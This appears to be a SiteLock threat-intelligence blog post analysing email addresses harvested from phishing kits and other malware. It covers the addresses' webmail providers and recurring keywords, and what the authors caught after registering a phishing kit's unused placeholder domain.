While analyzing malware 24/7, we decided to continue our collection of email addresses found in malicious code. With the help of SiteLock's Sig Q Team we tripled our existing collection of malware email addresses to over 3,000. Looking at the data we get to see the prefered email providers of phishers, key words in malicious email addresses, and the spoofed From: addresses used by bad actors. Finally, we capitalized on a test address and unregistered domain to get a look inside the end of the phishing process.
The full list of 3,060 email addresses list is on GitHub and can be used as indicators of compromise, particularly for website security. The list mainly consists of phishing addresses, with addresses from web shells, defacements, and other miscellaneous files rounding out the 3,000.
The majority of email addresses were collected from phishing infections -- disposable email addresses used to receive pilfered credentials. Below is an example of a phishing infection. It's a PHP file written or uploaded to a site that collects and sends unwary victims' email addresses and passwords to the malicious actors email address, hopful101@zoho[.]com.
Looking at the addresses, nearly two-thirds of the 3,000, 61 percent, used the gmail.com domain clearly showing Gmail is the webmail provider phishers prefer. Other mainstream webmail services trail far behind, with all Yahoo and Hotmail domains at 7 percent and 5 percent respectively.
Of note, comparing the initial 1,000 malware email addresses, Yandex use has almost doubled from 2 percent to almost 4 percent.
One interesting observation is the proclivity of phishers to use an iteration of the word ‘result' in receiving email addresses. There were 88 email addresses with a form of result in the collection.
Sample of Addresses Containing ‘result'
Also of note is the use of ‘customer-support' in the spoofed From: address from phishing mailers. Here there were seven iterations.
Addresses Containing ‘customer-support'
A particular email address from a phishing infection caught our attention, email@example.com. The file was part of a L33bo phishing kit and the email address was a placeholder for the To: address. We noticed the domain, l33bo.website, was unregistered and registered it. We then added a catchall for all email to the domain.
What we found were mostly test messages from the bad actors using the kit. There were a few legitimate results from botched installs, which were promptly deleted, and many bounces mostly to firstname.lastname@example.org.
Sample of L33bo Catchall Email (Apparently researchers prefer Gmail too.)
Note the Abuse email professing that the phishing form was assaulted with foul language. We will add pagez and email@example.com to the malware email list after publication of this article.
One of the most interesting emails the catchall caught was a solicitation for access to compromised cPanels and web shells. Prices were $5 for cPanel and $4 for web shells, 3-day warranty included.
Solicitation for cPanel and Web Shell Access
As ephemeral as email addresses in malware are, their value in catching existing infections and providing insight into the endpoint of compromises can't be discounted. The tactics of phishers are brought more to light by aggregating this possibly overlooked data -- the predominant use of Gmail shows phishers sway to the service like the wider public, and commonalities in recipient and spoofed From: addresses can be gleaned. And an unexpected insight emerged from the simple registration of a domain. SiteLock will continue to improve its technology and threat intelligence by finding new and new ways to look at data.